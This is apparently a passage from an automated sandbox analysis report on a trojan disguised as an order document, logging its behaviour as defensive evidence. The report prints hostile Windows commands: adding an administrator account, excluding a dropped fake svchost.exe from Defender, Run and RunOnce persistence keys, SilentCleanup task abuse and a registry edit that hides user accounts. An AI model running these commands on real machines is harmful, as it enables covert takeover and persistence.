                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators ADMIN~1 /add
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup users "user" /add
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators "user" /del
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Process Where ProcessID='6588'
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | WMI Queries: IWbemServices::ExecMethod - root\CIMV2 : Win32_Process.Handle="6588"::GetOwner
Source: C:\Windows\SysWOW64\net1.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Process Where ProcessID='4876'
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | WMI Queries: IWbemServices::ExecMethod - root\CIMV2 : Win32_Process.Handle="4876"::GetOwner
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Process Where ProcessID='6712'
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | WMI Queries: IWbemServices::ExecMethod - root\CIMV2 : Win32_Process.Handle="6712"::GetOwner
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#NEW ORDER FOR JANUARY 2022.exe.log
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_knfqx50j.snp.ps1
Source: classification engine | Classification label: mal100.troj.expl.evad.winEXE@71/19@1/1
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4672:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1744:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2628:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:612:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4780:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1556:120:WilError_01
Source: #NEW ORDER FOR JANUARY 2022.exe, DBAABFDBDFAFCAAFCBAACFCD/CEDBDFAEFBDFECBFCAE.cs | Cryptographic APIs: 'CreateDecryptor'
Source: svchost.exe.0.dr, DBAABFDBDFAFCAAFCBAACFCD/CEDBDFAEFBDFECBFCAE.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.df0000.0.unpack, DBAABFDBDFAFCAAFCBAACFCD/CEDBDFAEFBDFECBFCAE.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.#NEW ORDER FOR JANUARY 2022.exe.df0000.0.unpack, DBAABFDBDFAFCAAFCBAACFCD/CEDBDFAEFBDFECBFCAE.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 31.0.aspnet_regbrowsers.exe.400000.4.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 31.0.aspnet_regbrowsers.exe.400000.1.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: #NEW ORDER FOR JANUARY 2022.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: #NEW ORDER FOR JANUARY 2022.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: #NEW ORDER FOR JANUARY 2022.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: aspnet_regbrowsers.pdbp source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.730764637.00000000036ED000.00000004.00000001.sdmp
Source: Binary string: aspnet_regbrowsers.pdbp??? |?_CorExeMainmscoree.dll?% @ source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.779987071.000000000474D000.00000004.00000001.sdmp
Source: Binary string: ???Oy??.pdbError: CoCreateInstance(IID_ISymUnmanagedWriter) returns %X source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp
Source: Binary string: ComSvcConfig.pdb?x source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp
Source: Binary string: aspnet_regbrowsers.pdb source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.730764637.00000000036ED000.00000004.00000001.sdmp
Source: Binary string: ilasm.pdb source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp
Source: Binary string: E:\A\_work\940\s\obj\Editor\IntellisenseDef\Release\net472\Microsoft.VisualStudio.Language.Intellisense.pdb source: svchost.exe, svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp
Source: Binary string: ComSvcConfig.pdb source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Code function: 0_2_00DF9101 push ebx; ret
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Code function: 0_2_0581060B pushad ; retf
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Code function: 0_2_05812C5E pushfd ; ret
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Code function: 0_2_0581C95B push eax; iretd
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Code function: 32_2_00BF9101 push ebx; ret
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Code function: 32_2_053F2504 push E802005Eh; ret
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Code function: 32_2_078EF6B8 push eax; retf
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Code function: 32_2_078EFC53 push eax; iretd
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Code function: 36_2_00FB9101 push ebx; ret
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Code function: 36_2_0878EDE0 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Code function: 36_2_0878EE98 pushfd ; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Code function: 37_2_058E03EF push E801005Eh; ret
Source: #NEW ORDER FOR JANUARY 2022.exe | Static PE information: 0xAF0CF1CB [Wed Jan 24 10:45:31 2063 UTC]
Source: initial sample | Static PE information: section name: .text entropy: 7.93856030024

Persistence and Installation Behavior:

Adds a new user with administrator rights
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add
Drops executables to the windows directory (C:\Windows) and starts them
Source: unknown | Executable created and started: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
Drops PE files with benign system names
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | File created: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe

Boot Survival:

Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CBCDCCADCFFABAADCAAEECC
Creates autostart registry keys with suspicious names
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CBCDCCADCFFABAADCAAEECC
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CBCDCCADCFFABAADCAAEECC
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CBCDCCADCFFABAADCAAEECC

Hooking and other Techniques for Hiding and Protection:

Contains functionality to hide user accounts
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.723973005.0000000003251000.00000004.00000001.sdmp | String found in binary or memory: laREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp | String found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v 3 /t REG_DWORD /d 0
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp | String found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp | String found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000003.706917679.00000000062D2000.00000004.00000001.sdmp | String found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000003.706917679.00000000062D2000.00000004.00000001.sdmp | String found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
Source: svchost.exe, 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp | String found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
Source: svchost.exe, 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp | String found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
Source: svchost.exe, 00000020.00000003.735522789.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
Source: svchost.exe, 00000020.00000003.735522789.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
Source: svchost.exe, 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp | String found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v 3 /t REG_DWORD /d 0
Source: svchost.exe, 00000024.00000003.756169106.0000000006B42000.00000004.00000001.sdmp | String found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
Source: svchost.exe, 00000024.00000003.756169106.0000000006B42000.00000004.00000001.sdmp | String found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | String found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v 3 /t REG_DWORD /d 0
Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | String found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | String found in binary or memory: aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
